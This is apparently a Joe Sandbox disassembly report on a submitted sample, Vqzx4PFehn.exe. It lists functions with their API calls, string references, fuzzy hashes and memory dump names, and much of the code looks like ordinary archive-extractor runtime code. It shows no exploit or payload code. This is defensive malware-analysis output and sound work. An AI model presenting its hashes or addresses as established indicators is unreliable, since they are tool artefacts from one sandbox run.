Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
Instruction ID: 4dc47194e12eb4000521233aebb11717160d793e7e853d70aeab022ca3f212dc
Opcode Fuzzy Hash: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
Instruction Fuzzy Hash: 09E04F70D10B029ED7319B799588B41BAD87F44610F14885DF0DADB645DBB9D0818B50

Uniqueness

Uniqueness Score: -1.00%

Function 01022BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 01022CA1
___AdjustPointer.LIBCMT ref: 01022CC4
_abort.LIBCMT ref: 01022D12
___AdjustPointer.LIBCMT ref: 01022D60

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: eb1fb84442fcb89e1a407d2be86cfd50d803dad34d39e832dcb31f9eda7d2e21
Instruction ID: d77efd25ce6cdc8946388eb885a86333e916e2e7f5dd8850480e39ebe6793ff3
Opcode Fuzzy Hash: eb1fb84442fcb89e1a407d2be86cfd50d803dad34d39e832dcb31f9eda7d2e21
Instruction Fuzzy Hash: DF510671600326AFEB29AFD8D840BBAB7E4FF54310F24416DED85476A1D772E950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0102BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0102BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102BF5C

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,01024286,?,0000015D,?,?,?,?,01025762,000000FF,00000000,?,?), ref: 01028E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102BF82
_free.LIBCMT ref: 0102BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102BFA4

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
Instruction ID: 16c463447fe1139e3b3a2d5e9b34ac76e51a92e10dc0e862056522a5c2d1192e
Opcode Fuzzy Hash: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
Instruction Fuzzy Hash: 0D01D476601A317F3761157A5C8CDBB7FBDEEC2AA03140169FA84C6104EA668C0186B0

Uniqueness

Uniqueness Score: -1.00%

Function 01029869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,010291AD,0102B188,?,01029813,00000001,00000364,?,010240EF,?,?,01041098), ref: 0102986E
_free.LIBCMT ref: 010298A3
_free.LIBCMT ref: 010298CA
SetLastError.KERNEL32(00000000,?,01041098), ref: 010298D7
SetLastError.KERNEL32(00000000,?,01041098), ref: 010298E0

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e325d32940bd83ef50ce1536558b52985778350a46daa70b2af86d64d333abcd
Instruction ID: 94d8680c7ce6faa034e6ead7d51b6d70e6d318dffdf4a77fe5ba452f01adc7ac
Opcode Fuzzy Hash: e325d32940bd83ef50ce1536558b52985778350a46daa70b2af86d64d333abcd
Instruction Fuzzy Hash: 67012D36244632EBD3333238ACC4A5F26ADFFD167CF280136F5C596181EEB588064230

Uniqueness

Uniqueness Score: -1.00%

Function 01010EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 010111CF: ResetEvent.KERNEL32(?), ref: 010111E1
Part of subcall function 010111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 010111F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 01010F21
CloseHandle.KERNEL32(?,?), ref: 01010F3B
DeleteCriticalSection.KERNEL32(?), ref: 01010F54
CloseHandle.KERNEL32(?), ref: 01010F60
CloseHandle.KERNEL32(?), ref: 01010F6C

Part of subcall function 01010FE4: WaitForSingleObject.KERNEL32(?,000000FF,01011101,?,?,0101117F,?,?,?,?,?,01011169), ref: 01010FEA
Part of subcall function 01010FE4: GetLastError.KERNEL32(?,?,0101117F,?,?,?,?,?,01011169), ref: 01010FF6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 8c0405dde6e4d5b499ef7f72a47ae54d28c840843a4f45073b85df70b57f7bf8
Instruction ID: cd916ecec26834747e6e91f96997fdd2ab17f6b7fc3b79949b52777181375708
Opcode Fuzzy Hash: 8c0405dde6e4d5b499ef7f72a47ae54d28c840843a4f45073b85df70b57f7bf8
Instruction Fuzzy Hash: D5014C76500B44EBC7229B65D8C5BC6FBADFB08711F00092DF2EA96558CB7A6984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0102C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0102C817

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(?,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?,?), ref: 01028DF4

_free.LIBCMT ref: 0102C829
_free.LIBCMT ref: 0102C83B
_free.LIBCMT ref: 0102C84D
_free.LIBCMT ref: 0102C85F

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
Instruction ID: c8333c06bd12d0ad7bae8cbed2d8f9fa469a73dc77f445144ff55acd70a39c69
Opcode Fuzzy Hash: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
Instruction Fuzzy Hash: 7DF06232500221ABF670EA6CE584C5B77EDAA107207648C5BF2C8D7515CBB5F880CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01011FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01011FE5
_wcslen.LIBCMT ref: 01011FF6
_wcslen.LIBCMT ref: 01012006
_wcslen.LIBCMT ref: 01012014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0100B371,?,?,00000000,?,?,?), ref: 0101202F

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
Instruction ID: dedb9b0371da9c1cdf57d482c1c875e6784c658ef16abffee9ac1bdc85751d4a
Opcode Fuzzy Hash: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
Instruction Fuzzy Hash: 52F01D32008125BBCF226F51EC08DCE7F26EB44760B218415F69A5E0A1CB76D965D690

Uniqueness

Uniqueness Score: -1.00%

Function 01028900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0102891E

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(?,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?,?), ref: 01028DF4

_free.LIBCMT ref: 01028930
_free.LIBCMT ref: 01028943
_free.LIBCMT ref: 01028954
_free.LIBCMT ref: 01028965

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
Instruction ID: 7ff9524b0f86b1994407ebefd027f95ceb16a152c988fe3a02356dbfe374467e
Opcode Fuzzy Hash: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
Instruction Fuzzy Hash: 3AF03479911233ABA666BF28F8004493FE9FB287203044A07F5D89227DC77F4959DB91

Uniqueness

Uniqueness Score: -1.00%

Function 010115FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 010117BC
_swprintf.LIBCMT ref: 0101186B

Strings

%s: %s, xrefs: 010117CB
%ls, xrefs: 01011641, 01011657

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: b60e44409fba0a8bc3927ed1d18ffb0383e69dcb89216fa3ac27e7b3c115f821
Instruction ID: d31775acd51c765dfa0a4ea334c43984f661dd46a68a754d96ee2ed87854c4e7
Opcode Fuzzy Hash: b60e44409fba0a8bc3927ed1d18ffb0383e69dcb89216fa3ac27e7b3c115f821
Instruction Fuzzy Hash: D251D535288301F6F62A1AB48D45F7D7676BB19B08F048D46F7C6784E8D9BFA410871A

Uniqueness

Uniqueness Score: -1.00%

Function 01027F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Vqzx4PFehn.exe,00000104), ref: 01027FAE
_free.LIBCMT ref: 01028079
_free.LIBCMT ref: 01028083

Strings

C:\Users\user\Desktop\Vqzx4PFehn.exe, xrefs: 01027FA5, 01027FAC, 01027FDB, 01028013

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\Vqzx4PFehn.exe
API String ID: 2506810119-484915335
Opcode ID: 58455b69372227663aa6bf8483c770c1cdec6bd7baf6c8f08fedf981913552fc
Instruction ID: cf22fffd97cf6ec76734889ef236c0dfa12372b9c171a01b559e565830542d4a
Opcode Fuzzy Hash: 58455b69372227663aa6bf8483c770c1cdec6bd7baf6c8f08fedf981913552fc
Instruction Fuzzy Hash: 3C31A275A04229EFDB61DF99D880D9EBBFCEF99310F1080ABF98497210D6759A40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 010231D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010231FB
_abort.LIBCMT ref: 01023306

Strings

MOC, xrefs: 0102320D
RCC, xrefs: 01023215

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
Instruction ID: c858d9e6591e3be99bb352e16ecf85288f4dd1bef9b27f5543531d9304656829
Opcode Fuzzy Hash: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
Instruction Fuzzy Hash: A7418D71900229AFDF16DF98CC81AEEBBB5FF09304F188099FA446B211D339E950DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01007401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01007406

Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 010074CD

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Strings

SeSecurityPrivilege, xrefs: 0100744B
SeRestorePrivilege, xrefs: 01007460

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 4221ff3c257d581ce92a1f9d4a4cd0d69e698171c0f65a61bd18f2e24cf717df
Instruction ID: 6f04a2c1c482d9154cff54d49baf06ef2644776e36e69643ee98bc2ddebb20c5
Opcode Fuzzy Hash: 4221ff3c257d581ce92a1f9d4a4cd0d69e698171c0f65a61bd18f2e24cf717df
Instruction Fuzzy Hash: 5731D671E00259AAFF63EBA8CC44BEE7BA9BF55300F044055E5C5AB1C1CBB9A984C761

Uniqueness

Uniqueness Score: -1.00%

Function 0101AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0101ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101ADC2

Strings

ASKNEXTVOL, xrefs: 0101AD28

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: c3f16f8383c0fa42d46e3df5553a2683e6983e09c2b57d118a987571adbf77a7
Instruction ID: 94bc755e958b0fdd24a033ed09095d4b0464aa2dc4a6026eed6cd84fb23f48e5
Opcode Fuzzy Hash: c3f16f8383c0fa42d46e3df5553a2683e6983e09c2b57d118a987571adbf77a7
Instruction Fuzzy Hash: 5011B132345641FFE262AF6CDC45FAA7BA9EB4A752F800044F2C2DB0ACC77B94059721

Uniqueness

Uniqueness Score: -1.00%

Function 0100D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0100D954
_strncpy.LIBCMT ref: 0100D99A

Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,01041030,?,0100D928,00000000,?,00000050,01041030), ref: 01011DC4

Strings

$%s, xrefs: 0100D949
@%s, xrefs: 0100D93E

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
Instruction ID: 31def597853391b9143afd0f81739381f4809b5670d312a1ccd3346a033f7f1a
Opcode Fuzzy Hash: 7ca9fca125aab86798e96f28070bd920c222cb15f092ddd28ea1776cdc1b49b5
Instruction Fuzzy Hash: 3321D532800648AEFB22EEE8CC41FDE3BE9BF01300F040516FA909A1D1E332D249CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01010E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0100AC5A,00000008,?,00000000,?,0100D22D,?,00000000), ref: 01010E9F

Strings

Thread pool initialization failed., xrefs: 01010EB7

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 05ebbd1c9708beead066ec133280027776d9848f94030ce62857c470dc45d779
Instruction ID: da2b9517c12fdba17235caf7bda789cfad4f18e756de8c845cd89ed6d4cb695c
Opcode Fuzzy Hash: 05ebbd1c9708beead066ec133280027776d9848f94030ce62857c470dc45d779
Instruction Fuzzy Hash: 251151B16407099FD3314F6B98849A7FBECFB65754F14482EF1DAC6204D6B659808B50

Uniqueness

Uniqueness Score: -1.00%

Function 0101B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0101B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0101B304

Strings

GETPASSWORD1, xrefs: 0101B289

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
Instruction ID: 90168126a2390076cb5a9fa0461ac914f159448eabecc3f165c506425d23e3c1
Opcode Fuzzy Hash: 54a9b1b3c6ffad30263a138ffa0d1418e5df188ccd07da384aab28c917c4c374
